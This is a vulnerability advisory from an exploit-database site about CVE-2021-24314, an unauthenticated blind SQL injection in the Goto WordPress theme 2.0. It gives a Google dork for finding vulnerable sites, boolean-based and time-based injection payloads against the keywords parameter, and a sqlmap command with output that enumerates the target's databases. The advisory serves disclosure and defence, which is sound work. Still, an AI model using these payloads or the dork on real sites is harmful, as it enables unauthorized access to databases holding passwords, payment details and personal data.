Goto WordPress Theme 2.0 - Unauthenticated Blind SQL Injection

2021.05.17
ru m0ze (RU) ru
Risk: Low
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

/*! - # VULNERABILITY: Goto WordPress Theme 2.0 - Unauthenticated Blind SQL Injection - # GOOGLE DORK: inurl:/wp-content/themes/goto/ - # DATE: 2021-03-24 - # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ] - # VENDOR: BoostifyThemes [ https://boostifythemes.com ] - # SOFTWARE VERSION: 2.0 - # SOFTWARE LINK: https://themeforest.net/item/goto-tour-travel-wordpress-theme/21822828 - # CVSS: AV:N/AC:L/PR:N/UI:N/S:C - # CWE: CWE-89 - # CVE: CVE-2021-24314 */ ### -- [ Info: ] [i] An Unauthenticated Blind SQL Injection vulnerability was discovered in the Goto theme v2.0 for WordPress. [i] Vulnerable parameter(s): ?keywords=. [i] Blind SQL Injection type(s): boolean-based, time-based. ### -- [ Impact: ] [~] Unauthorized access to sensitive data from the database (passwords, credit card details, personal user information), database data modification (Insert/Update/Delete), administration operations execution on the database (such as shutdown the DBMS), in some cases issue commands to the OS or performing a DoS attack. ### -- [ Payloads: ] [$] 13%' AND 7478=7478 AND 'QcwX%'='QcwX&start_date=13 [$] 13%' AND (SELECT 1362 FROM (SELECT(SLEEP(8)))kpeo) AND 'ThDS%'='ThDS&start_date=13 ### -- [ PoC | Unauthenticated Blind SQL Injection | Search query (database names): ] [!] sqlmap --url="https://example.com/tour-list/?keywords=13&start_date=13" --random-agent -dbs --level=3 --threads=4 --dbms=MySQL -p keywords ___ __H__ ___ ___[,]_____ ___ ___ {1.5.3.16#dev} |_ -| . [(] | .'| . | |___|_ [']_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 02:20:47 /2021-03-24/ [02:20:47] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: keywords (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: keywords=13%' AND 7478=7478 AND 'QcwX%'='QcwX&start_date=13 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: keywords=13%' AND (SELECT 1362 FROM (SELECT(SLEEP(5)))kpeo) AND 'ThDS%'='ThDS&start_date=13 --- [02:20:58] [INFO] testing MySQL [02:21:00] [WARNING] reflective value(s) found and filtering out [02:21:00] [INFO] confirming MySQL [02:21:08] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.2.31, PHP 7.3.7, PHP back-end DBMS: MySQL >= 5.0.0 [02:21:08] [INFO] fetching database names [02:21:08] [INFO] fetching number of databases [02:21:28] [INFO] retrieved: 18 [02:23:02] [INFO] retrieved: information_schema [02:23:48] [INFO] retrieved: 4 [02:24:20] [INFO] retrieved: goto available databases [2]: [*] information_schema [*] goto [*] ending @ 02:32:25 /2021-03-24/ ### -- [ Contacts: ] [+] Website: m0ze.ru [+] GitHub: @m0ze [+] Telegram: @m0ze_ru [+] Twitter: @vladm0ze

References:

https://m0ze.ru/vulnerability/%5B2021-03-24%5D-%5BWordPress%5D-%5BCWE-89%5D-Goto-WordPress-Theme-v2.0.txt
https://twitter.com/vladm0ze


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top